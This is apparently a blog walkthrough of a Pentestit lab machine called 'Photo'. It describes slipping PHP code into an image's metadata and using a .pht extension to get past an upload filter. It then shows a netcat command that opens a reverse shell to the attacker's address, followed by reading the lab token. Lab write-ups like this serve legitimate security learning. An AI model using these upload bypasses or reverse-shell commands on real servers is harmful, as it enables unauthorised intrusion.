Pentestit.ru V.9 (Part 10) – Token Photo
So, another day, another tutorial. 😀
And this time we are going to focus our efforts in “Photo” machine.
As usual we start the nmap scan from our “ssh server” shell, and we see that we have 2 open ports SSH and HTTP.
$ nmap 192.168.0.6 -sV Starting Nmap 6.00 ( http://nmap.org ) at 2016-08-03 16:17 MSK Nmap scan report for 192.168.0.6 Host is up (0.0013s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0) 80/tcp open http nginx 1.10.0 Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
So we start by the most obvious things, and we start using our gathered username/password combinations to try to access via SSH. It turns out that didn’t worked.
So we need to search and dig into the http page.
Accessing it we encounter the following page:
Searching for “url title PTT” (because of PPT in title of the page)
We found page https://packagist.org/packages/crowd/ptt
It seams this is a CMS created by crowd. We analyze the CMS and look for information about it but nothing useful comes to our attention, as such we should start to test this upload feature. We start by testing different files, like .txt, .doc, .py, .sh, .html till we find out that only image files were being accepted.
So if this page only accept images, maybe we could upload a php reverse shell, using tamper data, passing a shell, and make the server think it’s an image. Lets try that:
The result was:
So it seams the image was uploaded but then, probably the server runs a function to analyze it and identified it wasn’t an image after-all and deleted it. So it seams we really need an image file…
We start to use our old friend Google to look for ways to insert php code into an image, and it turns out that apparently we can add code to the “comments” metadata section of an image, and then invoke it via the browser. So let’s try that:
We then saved that image. And upload it to our “photo server”. (Tool used to add comments was GIMP2)
The image uploaded successfully:
So now let’s try invoke it:
This only shows our image.
So it seams that it was uploaded successfully, but for some reason it was not handling our php code. This is were the secret was… the type of image had to be .pht (that was found sneak peeking the write-up), with this in mind, we changed the .gif to .pht and uploaded it.
The upload was successful (also):
When we tested it, we got something… 😀
Voila!!! It worked, so now we can run commands on the photo server.
We did some enumeration and found out that we have “nc” there. So we just need to setup a listener, and invoke the image with the following parameters:
192.168.0.6/upload/welcome4.pht?cmd=nc -nv 172.16.0.2 25432 -e /bin/bash
And there it was… our shell \o/
Now we just needed to go to our toket and see it’s contents
ls Xiz9soo4qua welcome4.pht cd Xiz9soo4qua ls photo.txt cat photo.txt e*****h***t